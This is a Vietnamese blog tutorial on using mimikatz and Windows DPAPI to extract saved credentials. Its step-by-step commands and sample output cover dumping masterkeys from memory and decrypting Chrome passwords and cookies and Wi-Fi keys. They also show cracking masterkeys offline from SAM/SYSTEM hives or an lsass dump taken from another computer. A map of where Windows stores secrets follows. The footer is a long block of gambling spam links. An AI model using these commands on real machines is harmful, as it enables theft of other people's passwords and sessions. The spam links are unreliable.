• Kiến thức
  • Network
  • Security
  • Software
  • Thủ thuật
  • Tin học văn phòng
  • Tin tức
  • Mail ảo tạm thời miễn phí
  • Tools tra cứu thông tin
  • Công cụ đổi số thành chữ
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA

Ellyx13 by Ellyx13
19/01/2021 - Updated on 24/07/2025
in Basic Hacking
A A
0

Mục lục bài viết

  1. Cách Windows lưu trữ mật khẩu
  2. Cách mã hóa và giải mã bằng DPAPI
  3. Cách giải mã tệp DPAPI trên máy tính khác
  4. Cách tìm Windows Masterkeys
  5. Cách lưu và sử dụng master keys
  6. CREDHIST
  7. Cách trích xuất tất cả mật khẩu của Google Chome
  8. Cách trích xuất tất cả cookie của Google Chome
  9. Cách trích xuất mật khẩu Wi-Fi của Windows
  10. Cách trích xuất mật khẩu Google Chrome từ một máy tính khác
  11. Nơi Windows lưu trữ mật khẩu
  12. Kết luận
  13. Câu hỏi thường gặp
    1. Mimikatz là gì và nó hoạt động như thế nào?
    2. DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu) là gì và vai trò của nó trong việc lưu trữ mật khẩu?
    3. Tôi có thể sử dụng Mimikatz để truy cập mật khẩu của người khác mà không cần sự cho phép không?

Trong bài viết “Cách hack mật khẩu Windows“, mình đã hướng dẫn các bạn cách hack pass login Windows 10 bằng truy xuất RAM. Còn trong bài viết hôm nay, mình sẽ hướng dẫn các bạn làm quen với chương trình mimikatz 2, chương trình mà mình đã sử dụng để trích xuất mật khẩu trong hệ thống đang sử dụng hoặc từ các tệp đăng ký Windows từ một máy tính khác.

Tham gia kênh Telegram của AnonyViet 👉 Link 👈

Cách Windows lưu trữ mật khẩu

Ngoài mật khẩu dùng để đăng nhập vào Windows, các mật khẩu dưới đây cũng được lưu trữ trong hệ điều hành này:

Các bài viết liên quan

Cách tăng độ dài mã PIN trên Windows để nâng cao bảo mật 27

Cách tăng độ dài mã PIN trên Windows để nâng cao bảo mật

15/02/2025 - Updated on 25/07/2025
Cách kiểm tra mật khẩu có bị lộ từ vụ rò rỉ dữ liệu RockYou 2024 28

Cách kiểm tra mật khẩu có bị lộ từ vụ rò rỉ dữ liệu RockYou 2024

09/07/2024 - Updated on 24/07/2025
Đang miễn phí ứng dụng quản lý mật khẩu Sticky Password Premium có giá $30 29

Đang miễn phí ứng dụng quản lý mật khẩu Sticky Password Premium có giá $30

05/01/2024 - Updated on 24/07/2025
Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính 30

Cách xem lại mật khẩu Wifi trên Andorid, iPhone và máy tính

27/06/2022 - Updated on 24/07/2025
  • Credential Manager
  • Windows Vault
  • Mật khẩu trình duyệt IE
  • Mật khẩu Wifi
  • Certifications
  • Mật khẩu VPN
  • SSH keys
  • Mật khẩu Google Chrome
  • Chứng chỉ Google Talk, Skype, Dropbox, iCloud, Safari

Tất cả các mật khẩu này đều được mã hóa. Để mã hóa mật khẩu và thông tin đăng nhập, hệ thống phải sử dụng DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu). Đối với người dùng cuối, tất cả các quy trình mã hóa và giải mã dữ liệu đều được minh bạch, tức là các nhà phát triển không đụng chạm tới dữ liệu thô của bạn.

Mật khẩu người dùng được sử dụng để mã hóa các dữ liệu này. Chính xác hơn, các master keys (khóa chính) được tạo ra, với sự trợ giúp của dữ liệu được mã hóa và giải mã, và mật khẩu người dùng được sử dụng để giải mã các khóa chính. Một người dùng có thể có nhiều master keys. Trên thực tế, hàm băm sẽ băm tất cả các mật khẩu cũ được lưu trữ và cố gắng giải mã khóa chính cho đến khi tìm thấy mã băm phù hợp.

Yêu cầu bắt buộc của cơ chế giải mã này là bạn phải có khoá chính phù hợp , ví dụ, mật khẩu từ trình duyệt web Google Chrome. Nhưng nếu bạn sao chép tệp chứa mật khẩu của trình duyệt này sang máy tính khác mà không có khóa chính của máy cũ, thì bạn sẽ không thể giải mã các mật khẩu này.

Cách mã hóa và giải mã bằng DPAPI

Chúng ta sẽ tiếp tục dùng công cụ mimikatz để thực nghiệm Hack tất cả Password đã lưu trên Windows.

Như đã đề cập ở trên, DPAPI được sử dụng để mã hóa và giải mã dữ liệu. DPAPI khá đơn giản không chỉ cho người dùng cuối, mà còn cho các nhà phát triển muốn sử dụng cách mã hóa này – có hai chức năng chính của DPAPI là mã hóa và giải mã, chúng có thể được gọi từ ứng dụng.

Trước khi chuyển sang trích xuất Password từ trình duyệt web và các Password khác được lưu trữ trên Windows, hãy tìm hiểu kỹ hơn về DPAPI. Nhiều bài báo hay đã giải thích cách hoạt động của DPAPI. Vậy nên mình sẽ không giải thích lại nữa, mà chỉ đơn giản là cung cấp các bài viết ở đây. Thay vì đi sâu vào chi tiết lý thuyết của DPAPI, chúng ta hãy thực hiện một vài ví dụ thực tế: mã hóa một chuỗi hoặc tệp bằng DPAPI.

Xem thêm:  Rat là gì ? Và cách thức hoạt động của Rat ?

Mô-đun dpapi được sử dụng để làm việc với DPAPI, lệnh protect được sử dụng để mã hóa dữ liệu. Lệnh này có tùy chọn bắt buộc là /data, cuối cùng, bạn chỉ cần nhập đường dẫn đến file hoặc văn bản cần mã hoá là được.

Ví dụ: tôi muốn mã hóa chuỗi ‘Test string to encrypt’:

dpapi::protect /data:"Test string to encrypt"

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA

Hãy chú ý đến phần “Blob:” – đây là dữ liệu được mã hóa ở dạng nhị phân.

Thay vì hiển thị dữ liệu trên command line, chúng có thể được lưu bằng tùy chọn /out:

dpapi::protect /data:"Test string to encrypt" /out:crypted.txt

Kết quả là, tệp crypted.txt đã được tạo. Tệp này chứa dữ liệu “Test string to encrypt” được mã hóa.

Như bạn có thể thấy, chúng ta không cần phải suy nghĩ về khóa chính và mật khẩu – hệ điều hành sẽ tự làm mọi thứ.

Để giải mã, hàm blob được sử dụng (blob là dữ liệu được mã hóa theo phương pháp này) từ cùng một mô-đun dpapi. Hàm này có một tùy chọn bắt buộc là /in, sau đó bạn cần chỉ định dữ liệu để giải mã. Để giải mã, bạn cũng cần chỉ tuỳ chọn /unprotect, nếu không thông tin về blob (dữ liệu được mã hóa) sẽ chỉ được hiển thị mà không có giải mã:

dpapi::blob /in:crypted.txt /unprotect

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 16Nếu bạn muốn lưu dữ liệu đã giải mã vào một tệp, thì hãy sử dụng tùy chọn /out.

Cách giải mã tệp DPAPI trên máy tính khác

Điều gì xảy ra nếu mình chuyển tệp crypto.txt sang một máy tính khác và cố gắng giải mã nó bằng cùng một lệnh trên? Thử xem nhé:

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 17

Việc giải mã đã không thành công và xuất hiện lỗi:

* using CryptUnprotectData API ERROR kuhl_m_dpapi_unprotect_raw_or_blob ; NTE_BAD_KEY_STATE, needed Masterkey is: {ac45381a-d9db-4c68-b0e9-7410667c3984}

Nếu bạn để ý kỹ lỗi thì sẽ tìm ra được, thứ chúng ta cần là Masterkey ac45381a-d9db-4c68-b0e9-7410667c3984.

Chuỗi ac45381a-d9db-4c68-b0e9-7410667c398 là mã băm khóa chính. Có thể nói đây là mã định danh hay vân tay của chìa khóa. Trên máy tính ban đầu, nơi dữ liệu đã được mã hóa, việc giải mã chúng rất đơn giản và dễ dàng. Còn khi chúng ta cố gắng giải mã dữ liệu này mà không có khóa chính sẽ không thành công. Vậy nên, thứ chúng ta cần là chỉ định Masterkey từ máy tính ban đầu, cụ thể là máy mà dữ liệu được mã hóa.

Mình đã trích xuất Masterkey và sẽ chỉ định nó bằng cách sử dụng tùy chọn /masterkey và chạy lại lệnh giải mã trên máy tính khác:

dpapi::blob /in:crypted.txt /unprotect /masterkey:5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 18

Thành công rồi đó!

Cách tìm Windows Masterkeys

Mimikatz có chức năng trích xuất tất cả các master keys của người dùng hiện tại. Nhưng trước khi chuyển sang phần đó, chúng ta phải tìm hiểu các masterkeys để hiểu hết về cách giải mã này nhé.

Ở dạng đã giải mã, ví dụ masterkey trông như thế này: 5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8

Các masterkeys được mã hóa và lưu trữ trong một thư mục có dạng %appdata%\Microsoft\Protect{sid}*. Giải thích:

  • %appdata% kà C:\Users<USER>\AppData\Roaming
  • {sid} là user SID

Trong CMD (Win + r → gõ cmd), bạn có thể thấy SID của mình bằng lệnh:

wmic useraccount where name="%USERNAME%" get sid

Lệnh đó sẽ không hoạt động trong PowerShell. Các lệnh sau sẽ hoạt động trong cả CMD và PowerShell.

Tìm SID của bạn:

whoami /user

Tìm SID cho tất cả các user:

wmic useraccount get name,sid

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 19

Các masterkey được mã hoá trên ổ cứng của bạn:

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 20

Hàm dpapi::masterkey có thể giải mã các masterkey. Nếu bạn chỉ sử dụng chức năng này với tùy chọn /in, và chỉ định đường dẫn đến masterkey, thì thông tin về nó sẽ được hiển thị mà không cần giải mã:

Xem thêm:  3 Cách xóa Password Windows nhanh nhất không cần nhập mật khẩu cũ

dpapi::masterkey /in:"%appdata%\Microsoft\Protect\S-1-5-21-4099021954-1290662600-116018068-1001\ac45381a-d9db-4c68-b0e9-7410667c3984"

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 21

Để trích xuất tất cả các masterkey của người dùng hiện tại cùng một lúc, hãy chạy lệnh:

sekurlsa::dpapi

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 22

Các masterkeys trong này gồm:

Authentication Id : 0 ; 371163 (00000000:0005a9db) Session : Interactive from 1 User Name : MiAl Domain : HACKWARE-MIAL Logon Server : HACKWARE-MIAL Logon Time : 25.02.2020 13:25:54 SID : S-1-5-21-4099021954-1290662600-116018068-1001 [00000000] * GUID : {abd3abfe-f620-46e4-a5ee-8dc314ef4169} * Time : 25.02.2020 18:34:11 * MasterKey : 450e3e2609e394dfef60c90533a06ddd84dc9968965bd8579a3c40607704077e506c8d0738e6f42cfd934b3eb75eedc3c29fe7deb8dd0cf05ddb4deb653fcbff * sha1(key) : 806d3a6453a45b9b4eb3e8edafc9dd4b12c0d494 [00000001] * GUID : {ac45381a-d9db-4c68-b0e9-7410667c3984} * Time : 25.02.2020 18:26:00 * MasterKey : 5dccd3bea06a52d4355fa6b03421845c9fe96277db0d5af1a24eb3daefb14d6fc66b386a3a235a29327d0dc1f7ca990389644af173893d4cf3392b3950953dd8 * sha1(key) : d5a7975eea70b6fe5eae3809ed3c7e9c864d1333

GUID là một định danh (identifier), tên của một tệp masterkey. MasterKey chính là khóa chủ.

Để thuận tiện, mimikatz lưu trữ một bộ nhớ cache của các masterkey được giải nén. Và không chỉ lưu trữ và hiển thị chúng, mà còn sử dụng masterkeys nếu cần cho các hoạt động nhất định. Để xem nội dung của bộ nhớ đệm, hãy chạy lệnh:

dpapi::cache

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 23

Các masterkeys được giải nén có thể được sử dụng trên máy khác.

Cách lưu và sử dụng master keys

Để lưu bộ nhớ cache, hãy sử dụng các tùy chọn /save và /file: FILE:

dpapi::cache /save/file:cache.bin

Nếu bạn sử dụng tuỳ chọn /file, thì theo mặc định, dữ liệu sẽ được lưu vào tệp mimikatz_dpapi_cache.ndr.

Để load bộ nhớ cache, hãy sử dụng tùy chọn /load và /file: FILE:

dpapi::cache /load /file:cache.bin

CREDHIST

Tệp này nằm trên đường dẫn “%appdata%\Microsoft\Protect\CREDHIST”, chỉ tác dụng trong trường hợp không thuộc domain nào cả. Tệp này:

  • chứa: thông tin đăng nhập được mã hóa trước đó của người dùng (SHA1 & NTLM)
  • được sử dụng để: giải mã masterkey
  • được bảo vệ bởi: mật khẩu SHA1 được dùng gần đây nhất
  • mỗi entry được bảo vệ bởi khóa trước đó, …..

Để xem các thuộc tính của tệp này, hãy chạy lệnh:

dpapi::credhist /in:"%appdata%\Microsoft\Protect\CREDHIST"

Ví dụ kết quả:

**CREDHIST** dwVersion : 00000001 - 1

guid : {86cddf31-2b68-42fb-a6e6-28b628228fc8}

dwNextLen : 00000000 - 0

Mình đã cố gắng giải mã tệp này trong mimikatz bằng lệnh:

dpapi::credhist /in:"Z:\files\CREDHIST" "/password:qweqwe123" /sid:S-1-5-21-4099021954-1290662600-116018068-1003

nhưng lại không thành công. Nếu bạn biết cách giải mã nó, hãy để lại bình luận nhé.

Cách trích xuất tất cả mật khẩu của Google Chome

Trong mimikatz, sử dụng lệnh dpapi :: chrome, bạn có thể trích xuất tất cả mật khẩu của người dùng hiện tại. Bạn cần sử dụng tùy chọn /in với đường dẫn đến tệp lưu trữ thông tin xác thực. Tệp này nằm trong “%localappdata%\Google\Chrome\User Data\Default\Login Data”. Nhân tiện, tệp này thuộc dạng cơ sở dữ liệu SQLite, trong đó tất cả dữ liệu ngoại trừ mật khẩu (ví dụ: địa chỉ của các trang web) được lưu trữ dưới dạng văn bản rõ ràng. Và mật khẩu được mã hóa bằng DPAPI. Để giải mã, chúng ta cần phải sử dụng tuỳ chọn /unprotect:

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect

Cách trích xuất tất cả cookie của Google Chome

Google Chome lưu trữ cookie trong tệp “%localappdata%\Google\Chrome\User Data\Default\Cookies”. Như với mật khẩu của trang web, tất cả dữ liệu ngoại trừ cookie sẽ được lưu trữ dưới dạng văn bản rõ ràng. Để truy xuất tất cả thông tin của cookie, hãy chạy lệnh:

dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect

Cách trích xuất mật khẩu Wi-Fi của Windows

Trong Windows, mật khẩu Wi-Fi có thể được trích xuất mà không cần mimikatz, ví dụ:

netsh wlan export profile interface= "<INTERFACE NAME>" key=clearfolder=c:\ netsh wlan export profile interface="*"key=clearfolder=c:\

Để phương pháp này hoạt động, bạn phải cắm card Wi-Fi.

Nhược điểm của phương pháp này là nó không hoạt động đối với máy tính đã tắt.

Trong mimikatz có lệnh dpapi :: wifi và dpapi :: wwan tương ứng để trích xuất mật khẩu từ các kết nối Wi-Fi và WWAN đã lưu.

Mật khẩu Wi-Fi được lưu dưới dạng:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{interface guid}*.xml

Và mật khẩu WWAN được lưu dưới dạng:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles{interface guid}*.xml

Bạn cần bắt đầu bằng cách lấy các masterkeys. Vì mình thực hiện các lệnh này trên local, nên mình giải mã các masterkey bằng lệnh:

sekurlsa::dpapi

Mình đã tìm thấy trên local hai interfaces, mỗi interfaces có một cấu hình kết nối Wi-Fi:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{24FF5798-6078-4148-96B5-75191CCEA209}{0C67E040-68A8-42A4-B870-8B5AA5E4823B}.xml
  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{C623DA26-72C0-4DD6-99B1-6E2C2D06E8C5}{A372AA08-55B8-4A66-A349-EAAB48580E0A}.xml
Xem thêm:  Sự nguy hiểm của thư mục .git

Để trích xuất mật khẩu Wi-Fi, mìnhchạy các lệnh:

dpapi::wifi /in:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{24FF5798-6078-4148-96B5-75191CCEA209}\{0C67E040-68A8-42A4-B870-8B5AA5E4823B}.xml"

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 24

Mật khẩu trong dòng “Key Material:”.

dpapi::wifi /in:"C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{C623DA26-72C0-4DD6-99B1-6E2C2D06E8C5}\{A372AA08-55B8-4A66-A349-EAAB48580E0A}.xml" /unprotect

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 25

Nếu masterkeys không có trong bộ nhớ cache mimikatz, bạn có thể chỉ định rõ ràng nó bằng tùy chọn /masterkey.

Cách trích xuất mật khẩu Google Chrome từ một máy tính khác

  1. Để giải mã tệp “%localappdata%\Google\Chrome\User Data\Default\Login Data”, bạn cần Masterkey được mã hóa mật khẩu trong tệp này.
  2. Để giải mã masterkeys, bạn cần mật khẩu người dùng Windows để đăng nhập vào hệ thống và tệp masterkeys được mã hóa, tức là tệp %appdata%\Microsoft\Protect{sid}*.
  3. Để bẻ khóa mật khẩu người dùng Windows, bạn cần có hàm băm NTLM.
  4. Để truy xuất mã băm NTLM, bạn cần các tệp đăng ký (registry files) C:/Windows/System32/config/SAM và C:/Windows/System32/config/SYSTEM, hoặc kết xuất lsass.DMP. Hơn nữa, tốt hơn là sử dụng kết xuất vì có thể trích xuất hàm băm SHA1 từ nó và hàm băm này có thể được sử dụng trực tiếp để giải mã masterkeys.
    lsadump::sam /system:C:\path\to\SYSTEM /sam:C:\path\to\SAM
  5. Sau đó, để lấy Masterkey ngoại tuyến, bạn cần chạy lệnh sau:
    dpapi::masterkey /in:"path\to\encrypted\masterkey" "/password:target_user_password" /sid:target_user_SID

SID có thể được lấy từ tên thư mục đến masterkeys được mã hóa.

dpapi::masterkey /in:"Z:\files\1f89c852-1c9d-47f9-81f8-b18be7c11512" "/password:qweqwe123" /sid:S-1-5-21-4099021954-1290662600-116018068-1003

Nếu thành công, thông tin sau sẽ được hiển thị ở cuối kết quả:

[masterkey] with volatile cache: SID:S-1-5-21-4099021954-1290662600-116018068-1003;GUID:{1bd91e0f-25f3-49e9-a370-bc68d1f0d272};MD4:ca76a176340f0291e1cc8ea7277fc571;SHA1:886d0f341f3c29030ec855334a08e52868c06c69; key : 89e43af0a178c2f1c7311c028dd75e2d2489fc78a3df92808094b1671785d6fd7f107ec562320bcaa8563be759abbf60bf70791107c5240cda2cfddcb003df19 sha1: b73d4d8cbbdafa960e49ca480559a4b530e65f05

Cách Hack Password Windows đã lưu bằng Mimikatz và DAPA 26

Dòng chính bắt đầu bằng key– đây là masterkey được giải mã.

Ngoài ra, masterkeys sẽ được lưu vào bộ nhớ đệm.

Cuối cùng, để giải mã ngoại tuyến mật khẩu trình duyệt Google Chrome, hãy chạy lệnh:

dpapi::chrome /in:"PATH\TO\Login Data" /unprotect /masterkey:MASTERKEY

Nếu masterkey đã có trong bộ nhớ cache, thì bạn có thể bỏ qua tùy chọn /masterkey.

Nơi Windows lưu trữ mật khẩu

Đây là các đường dẫn đến các tệp được mã hóa bằng DPAPI. Nếu bị thiếu cái nào, thì các bạn nhớ bình luận nhé:

Pivot table của tác giả mimikatz (rất khó đọc):

  • File Excel liệt kê nơi lưu Password trong Windows

Mật khẩu Wi-Fi được lưu trữ trong:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces{interface guid}*.xml

Mật khẩu WWAN được lưu trữ trong:

  • C:\ProgramData\Microsoft\Wlansvc\Profiles{interface guid}*.xml Xml

Cookies Google Chrome được lưu trữ trong:

  • %localappdata%\Google\Chrome\User Data\Default\Cookies

Mật khẩu của website được lưu trữ trong:

  • %localappdata%\Google\Chrome\User Data\Default\Login Data

% localappdata% thường là ‘C:\Users<USERNAME>\AppData\Local’.

Các masterkeys đã mã hóa được lưu trữ trong một thư mục có dạng %appdata%\Microsoft\Protect{sid}*.

  • %appdata% là C:\Users<USERNAME>\AppData\Roaming
  • {sid} là user SID

System master keys:

  • c:\Windows\System32\Microsoft\Protect*

Chứng chỉ user:

  • %APPDATA%\Microsoft\SystemCertificates\My\Certificates\
  • %APPDATA%\Microsoft\Crypto\RSA<SID>\

Chứng chỉ hệ thống:

  • HKLM:\SOFTWARE\Microsoft\SystemCertificates\MY\Certificates*
  • C:\Programdata\Microsoft\Crypto\RSA\MachineKeys\

Dropbox:

  • HKCU\SOFTWARE\Dropbox\ks
  • HKCU\SOFTWARE\Dropbox\ks1
  • %APPDATA%\Local\Dropbox\instance1\config.dbx
  • %APPDATA%\Local\Dropbox\instance_db\instanse.dbx

Rsa securid:

  • %LOCALAPPDATA%\RSA\SecurIDStorage

Kết luận

Bạn sẽ tìm thấy thêm thông tin trong tài liệu về các mô-đun và lệnh của mimikatz. 

Câu hỏi thường gặp

Mimikatz là gì và nó hoạt động như thế nào?

Mimikatz là một công cụ mạnh mẽ cho phép truy xuất mật khẩu và thông tin đăng nhập đã lưu trong hệ điều hành Windows. Nó hoạt động bằng cách khai thác các lỗ hổng bảo mật để truy cập vào bộ nhớ hệ thống và trích xuất dữ liệu nhạy cảm, bao gồm cả mật khẩu được lưu trữ bởi Credential Manager, trình duyệt web và các ứng dụng khác.

DPAPI (Giao diện lập trình ứng dụng bảo vệ dữ liệu) là gì và vai trò của nó trong việc lưu trữ mật khẩu?

DPAPI là một cơ chế mã hóa được tích hợp sẵn trong Windows, được sử dụng để bảo vệ dữ liệu nhạy cảm, bao gồm mật khẩu. Nó mã hóa dữ liệu bằng cách sử dụng các khóa chính được liên kết với tài khoản người dùng. Để giải mã, cần có khóa chính tương ứng.

Tôi có thể sử dụng Mimikatz để truy cập mật khẩu của người khác mà không cần sự cho phép không?

Không. Sử dụng Mimikatz để truy cập mật khẩu của người khác mà không có sự cho phép là bất hợp pháp và vi phạm đạo đức nghề nghiệp. Công cụ này chỉ nên được sử dụng cho mục đích nghiên cứu bảo mật hoặc với sự cho phép của chủ sở hữu hệ thống.

Tags: DAPAhack passwordMimikatzpassword
Ellyx13

Ellyx13

DevOps với hơn 7 năm kinh nghiệm trong lĩnh vực hạ tầng, tự động hóa CI/CD và triển khai hệ thống phân tán trên các nền tảng như AWS, Azure và Kubernetes. - AWS Certified DevOps Engineer – Professional - Certified Kubernetes Administrator (CKA) - HashiCorp Certified: Terraform Associate - Docker Certified Associate (DCA) Có người không dám bước vì sợ gãy chân, nhưng sợ gãy chân mà không dám bước đi thì khác nào chân đã gãy.

Related Posts

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit 31
Basic Hacking

Cách thực hiện kĩ thuật tấn công Shellcode Injection với Autoit

08/03/2025 - Updated on 25/07/2025
Cách khai thác lỗ hổng DLL Hijacking trên Windows 32
Basic Hacking

Cách khai thác lỗ hổng DLL Hijacking trên Windows

05/03/2025 - Updated on 25/07/2025
Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus 33
Basic Hacking

Htamal: kỹ thuật thực thi shellcode từ xa vượt qua phát hiện của Antivirus

10/02/2025 - Updated on 25/07/2025
Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn 34
Basic Hacking

Snov.io Email Finder: Tìm kiếm email chỉ với tên công ty/ tên miền/ hồ sơ LinkedIn

14/12/2024 - Updated on 24/07/2025
Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp 35
Basic Hacking

Capsolver: Giải pháp tự động giải CAPTCHA dành cho doanh nghiệp

12/12/2024 - Updated on 24/07/2025
Seekr: Thu thập & quản lý dữ liệu OSINT 36
Basic Hacking

Seekr: Thu thập & quản lý dữ liệu OSINT

22/11/2024 - Updated on 24/07/2025
guest

guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
oldest
newest
Inline Feedbacks
View all comments

Liên hệ Quảng Cáo

Lien he AnonyViet

Bài viết mới

Cách nhận ChatGPT K-12 Teacher miễn phí 6

Cách nhận ChatGPT K-12 Teacher miễn phí

by Lan Ngọc
13/01/2026
0

ChatGPT Health

ChatGPT Health là gì và cách tham gia danh sách chờ nhanh nhất

by Thanh Kim
12/01/2026
0

Hướng dẫn nhận ChatGPT Plus 1 tháng miễn phí bằng thẻ UnionPay Hàn Quốc 7

Hướng dẫn nhận ChatGPT Plus 1 tháng miễn phí bằng thẻ UnionPay Hàn Quốc

by Lan Ngọc
11/01/2026
0

Hướng dẫn nhận ChatGPT Go 1 năm miễn phí bằng thẻ MasterCard Ấn Độ 8

Hướng dẫn nhận ChatGPT Go 1 năm miễn phí bằng thẻ MasterCard Ấn Độ

by Lan Ngọc
11/01/2026 - Updated on 12/01/2026
0

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: support[@]anonyviet.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

DMCA.com Protection Status

Bình luận gần đây

  • Pad trong Cách mua tên miền giá rẻ .online/.store/.site chỉ với 5k
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Tùng trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Trung trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Ten trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Trinh trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • dung hoang trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • dung hoang trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Giang trong [Update] Cách nhận Google AI Pro 1 năm miễn phí bằng Telegram
  • quoc trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Lam trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Lam trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • Hieu trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân
  • AnonyViet trong Cách nhận ChatGPT Plus 12 tháng miễn phí qua ưu đãi quân nhân

©2025 AnonyViet - Chúng tôi mang đến cho bạ những kiến thức bổ ích về CNTT Công nghệ kết quả xổ số hôm nay 33win Ae888 kubet kubet 8kbet 99ok xin88 good88 kubet cakhiatv f8bet fm88 xin88 https://918xxy.com/ kubet thailand vip66 xoso66 https://tp88fun.com/ hello88 qq88 Xoso66 Vip66 hitclub bong99 XOSO66 new882.info Hi88 8day Thabet 33win Bk8 fun88 789win w88 nhà cái uy tín Go88 sunwin sunwin jun88 rikvip hitclub sunwin go88 s666 sv388 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 i9bet ok365 ae888 https://keonhacai.fund/ sunwin cakhiatv socolive QQ88 TP88 Xoso66 zx88 88vv fun88.supply king88 v9bet EE88 FB88 TYPHU88 https://da88.design/ Kkwin 79king xin88 https://fun88.supply/ thapcamtv gem88 F8BET80 sa88 https://q23win.com/ 32win https://lc88.jpn.com/ u888 8xbet W88 link 58win 58WIN https://hm8805.com/ 188bet ax88 33WIN https://bbet88b.com/ OK9 SHBET https://xx88.center/ vswin 789PCOM NHÀ CÁI MMOO bắn cá TT88COM GO 99 https://k8cc.wiki/ RR88 hit club Gem88 kclub vip79 dv88 Gi8 For88 Rikbet 8kbet ABC8 https://ww88.me/ https://nowgoal.ws/ https://tylekeonhacai.me/ https://keonhacai.org.vc/ https://xx88.ac/ xx88.me.uk ST666 88xx 98win 69VN XN88 NOHU90 68WIN GO99 AF88 HM88 HZ88 https://xx88.asia/ 789f NOHU HITCLUB Sunwin 58WIN MV88 888NEW AZ888 66B 789win PG99 https://u888wl.com/ x88 x88 HZ88 TD88 12bet v9bet betvisa betvisa vin777 vin777 ee88 bet88 abc8 c54 X88 https://lc88.bio/ NOHU90 Thapcam TV 